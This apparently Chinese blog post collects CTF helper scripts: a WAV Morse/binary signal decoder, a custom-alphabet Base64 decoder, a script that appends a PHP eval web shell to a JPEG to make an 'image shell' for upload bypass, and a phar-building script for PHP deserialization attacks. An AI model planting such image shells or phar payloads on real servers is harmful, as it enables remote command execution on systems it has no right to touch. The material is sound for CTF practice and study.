has_dot = "." in morse.morse_symbols has_dash = "-" in morse.morse_symbols if not (has_dot and has_dash): morse_score *= 0.65
if morse.decoded_text: stripped = morse.decoded_text.replace(" ", "") if len(stripped) >= 5 and len(set(stripped)) <= 1: morse_score *= 0.7 else: morse_score = 0.0
binary_score = binary.best_score text_len = len(binary.best_text.strip()) if text_len <= 1: binary_score *= 0.5 else: binary_score *= min(1.0, 0.55 + text_len / 10.0)
if morse_score >= binary_score + 0.05: return "morse", morse_score, binary_score if binary_score > 0.0: return "binary", morse_score, binary_score return "morse", morse_score, binary_score
def analyze_audio( audio_path: Path, frame_ms: float, min_run_ms: float, trim_edge_zeros: bool, max_text_chars: int,) -> Tuple[SignalStats, List[Run], MorseResult, BinaryResult]: samples, sample_rate = load_wav_mono(audio_path) envelope, _frame_size = compute_rms_envelope(samples, sample_rate, frame_ms=frame_ms) threshold = make_threshold(envelope) states = [1 if v >= threshold else 0 for v in envelope]
min_run_frames = max(1, int(round(min_run_ms / max(frame_ms, 1e-6)))) runs = smooth_runs(runs_from_states(states), min_frames=min_run_frames)
total_frames = sum(d for _, d in runs) active_frames = sum(d for s, d in runs if s == 1) active_ratio = (active_frames / total_frames) if total_frames else 0.0
stats = SignalStats( sample_rate=sample_rate, duration_sec=(len(samples) / sample_rate) if sample_rate else 0.0, frame_ms=frame_ms, frame_count=len(envelope), threshold=threshold, run_count=len(runs), active_ratio=active_ratio, )
morse = decode_morse(runs) binary = decode_binary( runs, trim_edge_zeros=trim_edge_zeros, max_text_chars=max_text_chars, ) return stats, runs, morse, binary
def print_report( mode: str, selected_mode: str, stats: SignalStats, runs: Sequence[Run], morse: MorseResult, binary: BinaryResult, verbose: bool,) -> None: print("== Signal Summary ==") print(f"sample_rate : {stats.sample_rate} Hz") print(f"duration : {stats.duration_sec:.3f} s") print(f"frame_ms : {stats.frame_ms:.3f} ms") print(f"frame_count : {stats.frame_count}") print(f"threshold : {stats.threshold:.6f}") print(f"run_count : {stats.run_count}") print(f"active_ratio : {stats.active_ratio:.2%}") print()
print("== Morse Candidate ==") print(f"dot_unit_frames: {morse.dot_unit_frames}") print(f"symbols : {morse.symbol_count}") print(f"known_ratio : {morse.known_ratio:.2%}") print(f"morse_raw : {morse.morse_symbols or '<empty>'}") print(f"decoded_text : {safe_text_preview(morse.decoded_text) or '<empty>'}") print()
print("== Binary Candidate ==") print(f"bit_unit_frames: {binary.bit_unit_frames}") print(f"bit_len : {binary.bitstream_length}") print(f"bit_preview : {binary.bitstream_preview or '<empty>'}") print(f"best_score : {binary.best_score:.4f}") print(f"best_codec : {binary.best_encoding or '<none>'}") print(f"best_order : {binary.best_bit_order or '<none>'}") print(f"best_offset : {binary.best_offset_bits}") print(f"decoded_text : {safe_text_preview(binary.best_text) or '<empty>'}") if binary.candidates: print("top_candidates :") for idx, c in enumerate(binary.candidates[:4], start=1): preview = safe_text_preview(c.text, 80) print( f" {idx}. score={c.score:.4f}, codec={c.encoding}, " f"order={c.bit_order}, offset={c.offset_bits}, text={preview}" ) print()
if mode == "auto": print(f"selected_mode : {selected_mode}") else: print(f"selected_mode : {mode}")
if selected_mode == "morse": final_text = morse.decoded_text else: final_text = binary.best_text
print(f"final_text : {safe_text_preview(final_text, 240) or '<empty>'}")
if verbose: print() print("== Runs (state, duration_frames, duration_ms) ==") for state, dur in runs[:120]: print(f"({state}, {dur}, {dur * stats.frame_ms:.2f} ms)") if len(runs) > 120: print(f"... truncated, total runs: {len(runs)}")
def main() -> None: parser = argparse.ArgumentParser( description="Decode pulse-encoded binary or Morse messages from WAV audio." ) parser.add_argument("audio_file", help="Input WAV file path.") parser.add_argument( "--mode", choices=["auto", "morse", "binary"], default="auto", help="Decode mode (default: auto).", ) parser.add_argument( "--frame-ms", type=float, default=5.0, help="Envelope frame size in milliseconds (default: 5.0).", ) parser.add_argument( "--min-run-ms", type=float, default=15.0, help="Minimum run length for spike smoothing (default: 15.0).", ) parser.add_argument( "--trim-edge-zeros", action="store_true", help="Trim large leading/trailing zero padding in binary mode.", ) parser.add_argument( "--max-text-chars", type=int, default=500, help="Max text length kept in decode candidates (default: 500).", ) parser.add_argument( "--json-out", default="", help="Optional path to save analysis report as JSON.", ) parser.add_argument( "--verbose", action="store_true", help="Print run list for debugging.", ) args = parser.parse_args()
audio_path = Path(args.audio_file) if not audio_path.exists(): raise FileNotFoundError(f"audio file not found: {audio_path}")
stats, runs, morse, binary = analyze_audio( audio_path=audio_path, frame_ms=max(0.2, args.frame_ms), min_run_ms=max(0.0, args.min_run_ms), trim_edge_zeros=args.trim_edge_zeros, max_text_chars=max(32, args.max_text_chars), )
if args.mode == "morse": selected_mode = "morse" elif args.mode == "binary": selected_mode = "binary" else: selected_mode, _morse_score, _binary_score = choose_auto_mode(morse, binary)
print_report( mode=args.mode, selected_mode=selected_mode, stats=stats, runs=runs, morse=morse, binary=binary, verbose=args.verbose, )
if args.json_out: out_obj = { "audio_file": str(audio_path), "mode": args.mode, "selected_mode": selected_mode, "stats": asdict(stats), "morse": asdict(morse), "binary": { **{k: v for k, v in asdict(binary).items() if k != "candidates"}, "candidates": [asdict(c) for c in binary.candidates], }, "runs": [{"state": s, "duration_frames": d} for s, d in runs], } with open(args.json_out, "w", encoding="utf-8") as f: json.dump(out_obj, f, ensure_ascii=False, indent=2) print(f"\nJSON report saved: {args.json_out}")
if __name__ == "__main__": main()
# =========================# 中文使用说明(示例)# =========================# 1) 自动模式(推荐):同时尝试莫斯码和二进制,自动选择更可信结果# python generic_surface_scan.py your_audio.wav --mode auto## 2) 只按莫斯码解析# python generic_surface_scan.py your_audio.wav --mode morse## 3) 只按二进制解析# python generic_surface_scan.py your_audio.wav --mode binary## 4) 导出 JSON 分析报告(包含候选结果、时序分段等)# python generic_surface_scan.py your_audio.wav --json-out result.json## 5) 常用调参# --frame-ms 包络分析帧长(毫秒),越小越细但更敏感,默认 5.0# --min-run-ms 平滑短脉冲噪声阈值(毫秒),默认 15.0# --trim-edge-zeros 二进制模式下裁剪前后大段 0 填充# --verbose 输出详细分段信息,便于人工排查MISC之base64:
#!/usr/bin/env python3"""交互式自定义 Base64 解码器
功能:1) 输入密文后解码2) 可选输入自定义 Base64 表3) 未输入表时默认使用标准 Base64 表"""
from __future__ import annotations
import base64
class CustomBase64Codec: STANDARD_TABLE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
def __init__(self, base_table: str | None = None) -> None: self.base_table = self.STANDARD_TABLE self._decode_table = str.maketrans(self.STANDARD_TABLE, self.STANDARD_TABLE) self.set_base_table(base_table)
@staticmethod def _validate_table(table: str) -> str: if len(table) != 64: raise ValueError("Base64 表必须正好 64 个字符。") if len(set(table)) != 64: raise ValueError("Base64 表中字符不能重复。") if "=" in table: raise ValueError("Base64 表不能包含 '='。") return table
def set_base_table(self, base_table: str | None) -> None: if not base_table: table = self.STANDARD_TABLE else: table = self._validate_table(base_table) self.base_table = table self._decode_table = str.maketrans(self.base_table, self.STANDARD_TABLE)
def decode_to_bytes(self, ciphertext: str) -> bytes: clean_text = "".join(ciphertext.split()) normalized = clean_text.translate(self._decode_table)
missing = len(normalized) % 4 if missing: normalized += "=" * (4 - missing)
return base64.b64decode(normalized, validate=False)
class CustomBase64Interactive: def __init__(self) -> None: self.codec = CustomBase64Codec()
def run(self) -> None: print("自定义 Base64 交互解码器") print("说明: Base64 表留空时,自动使用标准表。") print("直接回车不输入密文即可退出。") print()
while True: ciphertext = input("请输入密文: ").strip() if not ciphertext: print("已退出。") break
base_table = input("请输入 Base64 表(64字符,留空默认): ").strip() try: self.codec.set_base_table(base_table or None) except ValueError as exc: print(f"[表错误] {exc}") print() continue
try: raw = self.codec.decode_to_bytes(ciphertext) except Exception as exc: # noqa: BLE001 print(f"[解码失败] {exc}") print() continue
print(f"使用的 Base64 表: {self.codec.base_table}") try: decoded_text = raw.decode("utf-8") print(f"解码结果(UTF-8): {decoded_text}") except UnicodeDecodeError: print("解码结果不是 UTF-8 文本。") print(f"bytes(hex): {raw.hex()}") print()
if __name__ == "__main__": CustomBase64Interactive().run()WEB生成图片码脚本:
from PIL import Imageimport io
def generate_image_shell(output_path, shell_code): # 1. 在内存中创建一张真实的图片 (100x100 像素,蓝色) img = Image.new('RGB', (100, 100), color=(73, 109, 137))
# 2. 将图片保存到内存字节流中 img_byte_arr = io.BytesIO() img.save(img_byte_arr, format='JPEG') image_data = img_byte_arr.getvalue()
# 3. 将木马代码转换为字节 shell_bytes = shell_code.encode('utf-8')
# 4. 合并数据:图片二进制 + 木马二进制 # 注意:大多数图片查看器读到 JPEG 的结束符 FF D9 就会停止,后面的代码会被隐藏 final_data = image_data + shell_bytes
# 5. 写入文件 with open(output_path, 'wb') as f: f.write(final_data)
print(f"成功!生成的图片马路径: {output_path}") print(f"包含的代码: {shell_code}")
if __name__ == "__main__": # 定义输出文件名和木马内容 target_file = "payload.jpg" php_payload = "<?php @eval($_POST['cmd']); ?>"
generate_image_shell(target_file, php_payload)WEB_PHP反序列化_phar文件创建脚本:
<?phpclass TestObject {}
$phar = new Phar("exp.phar");$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>");
$obj = new TestObject();$phar->setMetadata($obj);
$phar->addFromString("test.txt", "test");$phar->stopBuffering();?>配合phar伪协议读取文件触发反序列化使用。
- 版权声明:本文由 余林阳 创作,转载请注明出处。
喜欢这篇文章吗?
点击右侧按钮为文章点赞,让更多人看到!
在下余林阳